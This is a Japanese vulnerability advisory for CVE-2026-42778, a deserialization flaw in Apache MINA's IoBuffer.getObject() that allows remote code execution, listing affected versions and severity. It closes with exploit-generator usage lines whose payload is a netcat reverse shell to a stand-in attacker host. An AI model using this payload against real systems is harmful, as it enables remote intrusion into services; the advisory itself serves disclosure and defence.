
CVE-2026-42778 EUVD-2026-26492 信頼できないデータの逆シリアル化(CWE-502)
Apache MINA の AbstractIoBuffer.getObject() メソッドにおける不完全な修正。逆シリアライズ可能なクラスを制限するクラス名許可リスト検証が、読み取り対象クラスの静的初期化子が実行された後に適用されるため、検証が遅すぎます。これは、CVE-2024-52046 に対する元の修正が 2.1.X および 2.2.X ブランチに正しく適用されなかったために発生します。影響を受けるバージョン: - Apache MINA 2.1.0 から 2.1.11 - Apache MINA 2.2.0 から 2.2.6
CVE ID: CVE-2026-42778
公開日: 2026年1月5日
影響度: 重大
エクスプロイトの入手可能性: 非公開、プライベートのみ。
CVSS: 9.8
パッチの有無: (公式パッチはまだありません)
攻撃者は悪意のあるシリアライズオブジェクトを作成し、IoBuffer.getObject() で処理されると、クラス名許可リスト検証が行われる前に静的初期化子を通じて任意のコードを実行できます。これは権限やユーザー操作を必要としないネットワーク経由で到達可能な脆弱性であるため、Apache MINA を使用し IoBuffer.getObject() メソッドを呼び出すアプリケーションではリモートコード実行が可能です。この脆弱性により、影響を受けるシステムの機密性、完全性、可用性が完全に侵害される可能性があります。
# コンパイルと生成
javac ExploitGenerator.java
java ExploitGenerator "nc -e /bin/sh attacker-ip 4444"
# ObjectSerializationCodecFactory を使用して MINA ベースのサービスにネットワーク経由で送信
# または IoBuffer.getObject() を呼び出す任意のエンドポイント